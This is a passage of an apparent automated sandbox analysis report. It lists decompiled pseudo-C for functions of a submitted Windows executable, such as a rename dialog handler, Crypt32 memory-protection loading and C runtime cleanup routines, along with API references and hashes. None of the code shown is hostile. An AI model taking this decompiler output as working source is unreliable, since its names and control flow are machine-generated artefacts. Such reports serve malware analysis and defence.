                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: GlobalResource$Object$BitmapDeleteLoadLock$AllocCreateFindFreeFromGdipSizeofUnlock
                                                    • String ID: ]
                                                    • API String ID: 1428510222-3352871620
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 83%
                                                    			E00CDD600(void* __eflags, struct HWND__* _a4, intOrPtr _a8, signed short _a12, WCHAR* _a16) {
                                                    				void* _t12;
                                                    				WCHAR* _t16;
                                                    				void* _t17;
                                                    				intOrPtr _t18;
                                                    				void* _t19;
                                                    				struct HWND__* _t21;
                                                    				signed short _t22;
                                                    
                                                    				_t16 = _a16;
                                                    				_t22 = _a12;
                                                    				_t21 = _a4;
                                                    				_t18 = _a8;
                                                    				if(E00CC1316(_t17, _t21, _t18, _t22, _t16, L"RENAMEDLG", 0, 0) != 0) {
                                                    					L10:
                                                    					return 1;
                                                    				}
                                                    				_t19 = _t18 - 0x110;
                                                    				if(_t19 == 0) {
                                                    					 *0xd1fcb4 = _t16;
                                                    					SetDlgItemTextW(_t21, 0x66, _t16);
                                                    					SetDlgItemTextW(_t21, 0x68,  *0xd1fcb4);
                                                    					goto L10;
                                                    				}
                                                    				if(_t19 != 1) {
                                                    					L5:
                                                    					return 0;
                                                    				}
                                                    				_t12 = (_t22 & 0x0000ffff) - 1;
                                                    				if(_t12 == 0) {
                                                    					GetDlgItemTextW(_t21, 0x68,  *0xd1fcb4, 0x800);
                                                    					_push(1);
                                                    					L7:
                                                    					EndDialog(_t21, ??);
                                                    					goto L10;
                                                    				}
                                                    				if(_t12 == 1) {
                                                    					_push(0);
                                                    					goto L7;
                                                    				}
                                                    				goto L5;
                                                    			}











                                                    APIs
                                                      • Part of subcall function 00CC1316: GetDlgItem.USER32(00000000,00003021), ref: 00CC135A
                                                      • Part of subcall function 00CC1316: SetWindowTextW.USER32(00000000,00CF35F4), ref: 00CC1370
                                                    • EndDialog.USER32(?,00000001), ref: 00CDD64B
                                                    • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00CDD661
                                                    • SetDlgItemTextW.USER32(?,00000066,?), ref: 00CDD675
                                                    • SetDlgItemTextW.USER32(?,00000068), ref: 00CDD684
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: ItemText$DialogWindow
                                                    • String ID: RENAMEDLG
                                                    • API String ID: 445417207-3299779563
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00CE7E24,?,?,00CE7DC4,?,00CFC300,0000000C,00CE7F1B,?,00000002), ref: 00CE7E93
                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00CE7EA6
                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,00CE7E24,?,?,00CE7DC4,?,00CFC300,0000000C,00CE7F1B,?,00000002,00000000), ref: 00CE7EC9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                    • String ID: CorExitProcess$mscoree.dll
                                                    • API String ID: 4061214504-1276376045
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00CCF2C5(struct HINSTANCE__** __ecx) {
                                                    				void* _t5;
                                                    				struct HINSTANCE__* _t6;
                                                    				struct HINSTANCE__** _t9;
                                                    
                                                    				_t9 = __ecx;
                                                    				if(__ecx[1] == 0) {
                                                    					_t6 = E00CD081B(L"Crypt32.dll");
                                                    					 *__ecx = _t6;
                                                    					if(_t6 != 0) {
                                                    						_t9[2] = GetProcAddress(_t6, "CryptProtectMemory");
                                                    						_t6 = GetProcAddress( *_t9, "CryptUnprotectMemory");
                                                    						_t9[3] = _t6;
                                                    					}
                                                    					_t9[1] = 1;
                                                    					return _t6;
                                                    				}
                                                    				return _t5;
                                                    			}







                                                    APIs
                                                      • Part of subcall function 00CD081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00CD0836
                                                      • Part of subcall function 00CD081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00CCF2D8,Crypt32.dll,00000000,00CCF35C,?,?,00CCF33E,?,?,?), ref: 00CD0858
                                                    • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00CCF2E4
                                                    • GetProcAddress.KERNEL32(00D081C8,CryptUnprotectMemory), ref: 00CCF2F4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                    • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                    • API String ID: 2141747552-1753850145
                                                    • Opcode ID: 377ab341597340c7665a507bc8b4f9a7425c9ab9850eac5f418c093c24e566e6
                                                    • Instruction ID: 7f96bdb2a5efab659707fd71b9d336ac5778cd98872596ca605f7cab9007a85c
                                                    • Opcode Fuzzy Hash: 377ab341597340c7665a507bc8b4f9a7425c9ab9850eac5f418c093c24e566e6
                                                    • Instruction Fuzzy Hash: 99E02630801785BECB209F79D80CB217ED46F04700F14882EF1DA93340CAB0D141DB02
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 63%
                                                    			E00CE2BDA(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                    				signed char* _t52;
                                                    				signed int _t53;
                                                    				intOrPtr _t54;
                                                    				signed int _t58;
                                                    				signed int _t61;
                                                    				intOrPtr _t71;
                                                    				signed int _t75;
                                                    				signed int _t79;
                                                    				signed char _t81;
                                                    				signed char _t84;
                                                    				signed int _t85;
                                                    				signed int _t86;
                                                    				signed int _t97;
                                                    				signed char _t99;
                                                    				signed int* _t100;
                                                    				signed char* _t103;
                                                    				signed int _t109;
                                                    				void* _t113;
                                                    
                                                    				_push(0x10);
                                                    				_push(0xcfc248);
                                                    				E00CDF5F0(__ebx, __edi, __esi);
                                                    				_t75 = 0;
                                                    				_t52 =  *(_t113 + 0x10);
                                                    				_t81 = _t52[4];
                                                    				if(_t81 == 0 ||  *((intOrPtr*)(_t81 + 8)) == 0) {
                                                    					L30:
                                                    					_t53 = 0;
                                                    					__eflags = 0;
                                                    					goto L31;
                                                    				} else {
                                                    					_t99 = _t52[8];
                                                    					if(_t99 != 0 ||  *_t52 < 0) {
                                                    						_t84 =  *_t52;
                                                    						_t109 =  *(_t113 + 0xc);
                                                    						if(_t84 >= 0) {
                                                    							_t109 = _t109 + 0xc + _t99;
                                                    						}
                                                    						 *(_t113 - 4) = _t75;
                                                    						_t103 =  *(_t113 + 0x14);
                                                    						if(_t84 >= 0 || ( *_t103 & 0x00000010) == 0) {
                                                    							L10:
                                                    							_t54 =  *((intOrPtr*)(_t113 + 8));
                                                    							__eflags = _t84 & 0x00000008;
                                                    							if((_t84 & 0x00000008) == 0) {
                                                    								__eflags =  *_t103 & 0x00000001;
                                                    								if(( *_t103 & 0x00000001) == 0) {
                                                    									_t85 =  *(_t54 + 0x18);
                                                    									__eflags = _t103[0x18] - _t75;
                                                    									if(_t103[0x18] != _t75) {
                                                    										__eflags = _t85;
                                                    										if(_t85 == 0) {
                                                    											goto L32;
                                                    										} else {
                                                    											__eflags = _t109;
                                                    											if(_t109 == 0) {
                                                    												goto L32;
                                                    											} else {
                                                    												__eflags =  *_t103 & 0x00000004;
                                                    												_t79 = 0;
                                                    												_t75 = (_t79 & 0xffffff00 | ( *_t103 & 0x00000004) != 0x00000000) + 1;
                                                    												__eflags = _t75;
                                                    												 *(_t113 - 0x20) = _t75;
                                                    												goto L29;
                                                    											}
                                                    										}
                                                    									} else {
                                                    										__eflags = _t85;
                                                    										if(_t85 == 0) {
                                                    											goto L32;
                                                    										} else {
                                                    											__eflags = _t109;
                                                    											if(_t109 == 0) {
                                                    												goto L32;
                                                    											} else {
                                                    												E00CE0320(_t109, E00CE027C(_t85,  &(_t103[8])), _t103[0x14]);
                                                    												goto L29;
                                                    											}
                                                    										}
                                                    									}
                                                    								} else {
                                                    									__eflags =  *(_t54 + 0x18);
                                                    									if( *(_t54 + 0x18) == 0) {
                                                    										goto L32;
                                                    									} else {
                                                    										__eflags = _t109;
                                                    										if(_t109 == 0) {
                                                    											goto L32;
                                                    										} else {
                                                    											E00CE0320(_t109,  *(_t54 + 0x18), _t103[0x14]);
                                                    											__eflags = _t103[0x14] - 4;
                                                    											if(_t103[0x14] == 4) {
                                                    												__eflags =  *_t109;
                                                    												if( *_t109 != 0) {
                                                    													_push( &(_t103[8]));
                                                    													_push( *_t109);
                                                    													goto L21;
                                                    												}
                                                    											}
                                                    											goto L29;
                                                    										}
                                                    									}
                                                    								}
                                                    							} else {
                                                    								_t97 =  *(_t54 + 0x18);
                                                    								goto L12;
                                                    							}
                                                    						} else {
                                                    							_t71 =  *0xd2205c; // 0x0
                                                    							 *((intOrPtr*)(_t113 - 0x1c)) = _t71;
                                                    							if(_t71 == 0) {
                                                    								goto L10;
                                                    							} else {
                                                    								 *0xcf3278();
                                                    								_t97 =  *((intOrPtr*)(_t113 - 0x1c))();
                                                    								L12:
                                                    								if(_t97 == 0 || _t109 == 0) {
                                                    									L32:
                                                    									E00CE8D24(_t75, _t99, _t103, _t109);
                                                    									asm("int3");
                                                    									_push(8);
                                                    									_push(0xcfc268);
                                                    									E00CDF5F0(_t75, _t103, _t109);
                                                    									_t100 =  *(_t113 + 0x10);
                                                    									_t86 =  *(_t113 + 0xc);
                                                    									__eflags =  *_t100;
                                                    									if(__eflags >= 0) {
                                                    										_t105 = _t86 + 0xc + _t100[2];
                                                    										__eflags = _t86 + 0xc + _t100[2];
                                                    									} else {
                                                    										_t105 = _t86;
                                                    									}
                                                    									 *(_t113 - 4) =  *(_t113 - 4) & 0x00000000;
                                                    									_t110 =  *(_t113 + 0x14);
                                                    									_push( *(_t113 + 0x14));
                                                    									_push(_t100);
                                                    									_push(_t86);
                                                    									_t77 =  *((intOrPtr*)(_t113 + 8));
                                                    									_push( *((intOrPtr*)(_t113 + 8)));
                                                    									_t58 = E00CE2BDA(_t77, _t105, _t110, __eflags) - 1;
                                                    									__eflags = _t58;
                                                    									if(_t58 == 0) {
                                                    										_t61 = E00CE38E4(_t105, _t110[0x18], E00CE027C( *((intOrPtr*)(_t77 + 0x18)),  &(_t110[8])));
                                                    									} else {
                                                    										_t61 = _t58 - 1;
                                                    										__eflags = _t61;
                                                    										if(_t61 == 0) {
                                                    											_t61 = E00CE38F4(_t105, _t110[0x18], E00CE027C( *((intOrPtr*)(_t77 + 0x18)),  &(_t110[8])), 1);
                                                    										}
                                                    									}
                                                    									 *(_t113 - 4) = 0xfffffffe;
                                                    									 *[fs:0x0] =  *((intOrPtr*)(_t113 - 0x10));
                                                    									return _t61;
                                                    								} else {
                                                    									 *_t109 = _t97;
                                                    									_push( &(_t103[8]));
                                                    									_push(_t97);
                                                    									L21:
                                                    									 *_t109 = E00CE027C();
                                                    									L29:
                                                    									 *(_t113 - 4) = 0xfffffffe;
                                                    									_t53 = _t75;
                                                    									L31:
                                                    									 *[fs:0x0] =  *((intOrPtr*)(_t113 - 0x10));
                                                    									return _t53;
                                                    								}
                                                    							}
                                                    						}
                                                    					} else {
                                                    						goto L30;
                                                    					}
                                                    				}
                                                    			}






















                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AdjustPointer$_abort
                                                    • String ID:
                                                    • API String ID: 2252061734-0
                                                    • Opcode ID: 4c10d58a269b944166c25be6be43505d575ca3e15d219911cac45acdb3a3335c
                                                    • Instruction ID: 295195b47ea4778bb7cecedc7b8f90dbaa315d9ff3c0a9f332f1c8745914a209
                                                    • Opcode Fuzzy Hash: 4c10d58a269b944166c25be6be43505d575ca3e15d219911cac45acdb3a3335c
                                                    • Instruction Fuzzy Hash: 9151F572600296AFEB298F16DC45B7AB7A9FF14310F34412DEE16472A1D771EE80E790
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 93%
                                                    			E00CEBF30() {
                                                    				int _v8;
                                                    				void* __ecx;
                                                    				void* _t6;
                                                    				int _t7;
                                                    				char* _t13;
                                                    				int _t17;
                                                    				void* _t19;
                                                    				char* _t25;
                                                    				WCHAR* _t27;
                                                    
                                                    				_t27 = GetEnvironmentStringsW();
                                                    				if(_t27 == 0) {
                                                    					L7:
                                                    					_t13 = 0;
                                                    				} else {
                                                    					_t6 = E00CEBEF9(_t27);
                                                    					_pop(_t19);
                                                    					_t17 = _t6 - _t27 >> 1;
                                                    					_t7 = WideCharToMultiByte(0, 0, _t27, _t17, 0, 0, 0, 0);
                                                    					_v8 = _t7;
                                                    					if(_t7 == 0) {
                                                    						goto L7;
                                                    					} else {
                                                    						_t25 = E00CE8E06(_t19, _t7);
                                                    						if(_t25 == 0 || WideCharToMultiByte(0, 0, _t27, _t17, _t25, _v8, 0, 0) == 0) {
                                                    							_t13 = 0;
                                                    						} else {
                                                    							_t13 = _t25;
                                                    							_t25 = 0;
                                                    						}
                                                    						E00CE8DCC(_t25);
                                                    					}
                                                    				}
                                                    				if(_t27 != 0) {
                                                    					FreeEnvironmentStringsW(_t27);
                                                    				}
                                                    				return _t13;
                                                    			}













                                                    APIs
                                                    • GetEnvironmentStringsW.KERNEL32 ref: 00CEBF39
                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00CEBF5C
                                                      • Part of subcall function 00CE8E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00CE4286,?,0000015D,?,?,?,?,00CE5762,000000FF,00000000,?,?), ref: 00CE8E38
                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00CEBF82
                                                    • _free.LIBCMT ref: 00CEBF95
                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00CEBFA4
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                    • String ID:
                                                    • API String ID: 336800556-0
                                                    • Opcode ID: 970310c8a2e49b5fe8c78250903b785cf4f676521761b80e7ccdd641dc74dff2
                                                    • Instruction ID: 8c4043415e66c6fa6827c4c67a8fd431d70be9de0a163b5fc7a4104fdde0839d
                                                    • Opcode Fuzzy Hash: 970310c8a2e49b5fe8c78250903b785cf4f676521761b80e7ccdd641dc74dff2
                                                    • Instruction Fuzzy Hash: 5601F27A6012917F27212AFB5C8DE7F7A6DEEC2BA03254129F908D3200EF60CE01D5B1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 82%
                                                    			E00CE9869(void* __ecx, void* __edx) {
                                                    				void* __ebx;
                                                    				void* __edi;
                                                    				intOrPtr _t2;
                                                    				void* _t4;
                                                    				void* _t10;
                                                    				void* _t11;
                                                    				void* _t13;
                                                    				void* _t16;
                                                    				void* _t17;
                                                    				long _t18;
                                                    
                                                    				_t11 = __ecx;
                                                    				_t18 = GetLastError();
                                                    				_t10 = 0;
                                                    				_t2 =  *0xcfe7fc; // 0x6
                                                    				_t21 = _t2 - 0xffffffff;
                                                    				if(_t2 == 0xffffffff) {
                                                    					L2:
                                                    					_t17 = E00CEB136(_t11, 1, 0x364);
                                                    					_pop(_t13);
                                                    					if(_t17 != 0) {
                                                    						_t4 = E00CEAEB1(_t10, _t13, _t17, __eflags,  *0xcfe7fc, _t17);
                                                    						__eflags = _t4;
                                                    						if(_t4 != 0) {
                                                    							E00CE9649(_t13, _t17, 0xd22288);
                                                    							E00CE8DCC(_t10);
                                                    							__eflags = _t17;
                                                    							if(_t17 != 0) {
                                                    								goto L9;
                                                    							} else {
                                                    								goto L8;
                                                    							}
                                                    						} else {
                                                    							_push(_t17);
                                                    							goto L4;
                                                    						}
                                                    					} else {
                                                    						_push(_t10);
                                                    						L4:
                                                    						E00CE8DCC();
                                                    						L8:
                                                    						SetLastError(_t18);
                                                    					}
                                                    				} else {
                                                    					_t17 = E00CEAE5B(0, _t11, _t16, _t21, _t2);
                                                    					if(_t17 != 0) {
                                                    						L9:
                                                    						SetLastError(_t18);
                                                    						_t10 = _t17;
                                                    					} else {
                                                    						goto L2;
                                                    					}
                                                    				}
                                                    				return _t10;
                                                    			}














                                                    APIs
                                                    • GetLastError.KERNEL32(?,?,?,00CE91AD,00CEB188,?,00CE9813,00000001,00000364,?,00CE40EF,?,?,00D01098), ref: 00CE986E
                                                    • _free.LIBCMT ref: 00CE98A3
                                                    • _free.LIBCMT ref: 00CE98CA
                                                    • SetLastError.KERNEL32(00000000,?,00D01098), ref: 00CE98D7
                                                    • SetLastError.KERNEL32(00000000,?,00D01098), ref: 00CE98E0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$_free
                                                    • String ID:
                                                    • API String ID: 3170660625-0
                                                    • Opcode ID: 2fab09bdc86c215ef71c143e5e2893f0ab873067ca5ffa6c946eb3ba86abb443
                                                    • Instruction ID: ac248acbc2ea9a7882ee85b15383301b9dabeb8db4894825fff335374fa8b23f
                                                    • Opcode Fuzzy Hash: 2fab09bdc86c215ef71c143e5e2893f0ab873067ca5ffa6c946eb3ba86abb443
                                                    • Instruction Fuzzy Hash: FD01F4361446C17BC23223676C85B3F252DDFD3774B250136F525921F2EE748E05A166
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 82%
                                                    			E00CD0EED(void* __ecx) {
                                                    				intOrPtr _v16;
                                                    				void* __ebp;
                                                    				int _t16;
                                                    				long* _t20;
                                                    				void** _t26;
                                                    				void* _t28;
                                                    				void* _t30;
                                                    				intOrPtr _t31;
                                                    
                                                    				_t22 = __ecx;
                                                    				_push(0xffffffff);
                                                    				_push(0xcf2641);
                                                    				_push( *[fs:0x0]);
                                                    				 *[fs:0x0] = _t31;
                                                    				_t28 = __ecx;
                                                    				E00CD11CF(__ecx);
                                                    				_t20 = 0;
                                                    				 *((char*)(__ecx + 0x314)) = 1;
                                                    				ReleaseSemaphore( *(__ecx + 0x318), 0x40, 0);
                                                    				if( *((intOrPtr*)(_t28 + 0x104)) > 0) {
                                                    					_t26 = _t28 + 4;
                                                    					do {
                                                    						E00CD0FE4(_t22, _t30,  *_t26);
                                                    						CloseHandle( *_t26);
                                                    						_t20 = _t20 + 1;
                                                    						_t26 =  &(_t26[1]);
                                                    					} while (_t20 <  *((intOrPtr*)(_t28 + 0x104)));
                                                    				}
                                                    				DeleteCriticalSection(_t28 + 0x320);
                                                    				CloseHandle( *(_t28 + 0x318));
                                                    				_t16 = CloseHandle( *(_t28 + 0x31c));
                                                    				 *[fs:0x0] = _v16;
                                                    				return _t16;
                                                    			}












                                                    APIs
                                                      • Part of subcall function 00CD11CF: ResetEvent.KERNEL32(?), ref: 00CD11E1
                                                      • Part of subcall function 00CD11CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00CD11F5
                                                    • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00CD0F21
                                                    • CloseHandle.KERNEL32(?,?), ref: 00CD0F3B
                                                    • DeleteCriticalSection.KERNEL32(?), ref: 00CD0F54
                                                    • CloseHandle.KERNEL32(?), ref: 00CD0F60
                                                    • CloseHandle.KERNEL32(?), ref: 00CD0F6C
                                                      • Part of subcall function 00CD0FE4: WaitForSingleObject.KERNEL32(?,000000FF,00CD1101,?,?,00CD117F,?,?,?,?,?,00CD1169), ref: 00CD0FEA
                                                      • Part of subcall function 00CD0FE4: GetLastError.KERNEL32(?,?,00CD117F,?,?,?,?,?,00CD1169), ref: 00CD0FF6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                    • String ID:
                                                    • API String ID: 1868215902-0
                                                    • Opcode ID: 6d67d228531dc42f2efe32586dfc1a921c5d95c9a8e839f9129fb990027efd36
                                                    • Instruction ID: 69bc1a2d8e147d72c3519467edd160327076d1944e786d843cb0dbd43cc5539f
                                                    • Opcode Fuzzy Hash: 6d67d228531dc42f2efe32586dfc1a921c5d95c9a8e839f9129fb990027efd36
                                                    • Instruction Fuzzy Hash: 71015271500744FFC7229B64DC84FDAFBA9FB08710F10092AF26B92160CB757A45DA55
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00CEC7FF(intOrPtr* _a4) {
                                                    				intOrPtr _t6;
                                                    				intOrPtr* _t21;
                                                    				void* _t23;
                                                    				void* _t24;
                                                    				void* _t25;
                                                    				void* _t26;
                                                    				void* _t27;
                                                    
                                                    				_t21 = _a4;
                                                    				if(_t21 != 0) {
                                                    					_t23 =  *_t21 -  *0xcfeea0; // 0xcfee94
                                                    					if(_t23 != 0) {
                                                    						E00CE8DCC(_t7);
                                                    					}
                                                    					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0xcfeea4; // 0xd226fc
                                                    					if(_t24 != 0) {
                                                    						E00CE8DCC(_t8);
                                                    					}
                                                    					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0xcfeea8; // 0xd226fc
                                                    					if(_t25 != 0) {
                                                    						E00CE8DCC(_t9);
                                                    					}
                                                    					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0xcfeed0; // 0xcfee98
                                                    					if(_t26 != 0) {
                                                    						E00CE8DCC(_t10);
                                                    					}
                                                    					_t6 =  *((intOrPtr*)(_t21 + 0x34));
                                                    					_t27 = _t6 -  *0xcfeed4; // 0xd22700
                                                    					if(_t27 != 0) {
                                                    						return E00CE8DCC(_t6);
                                                    					}
                                                    				}
                                                    				return _t6;
                                                    			}











                                                    APIs
                                                    • _free.LIBCMT ref: 00CEC817
                                                      • Part of subcall function 00CE8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00CEC896,?,00000000,?,00000000,?,00CEC8BD,?,00000007,?,?,00CECCBA,?), ref: 00CE8DE2
                                                      • Part of subcall function 00CE8DCC: GetLastError.KERNEL32(?,?,00CEC896,?,00000000,?,00000000,?,00CEC8BD,?,00000007,?,?,00CECCBA,?,?), ref: 00CE8DF4
                                                    • _free.LIBCMT ref: 00CEC829
                                                    • _free.LIBCMT ref: 00CEC83B
                                                    • _free.LIBCMT ref: 00CEC84D
                                                    • _free.LIBCMT ref: 00CEC85F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
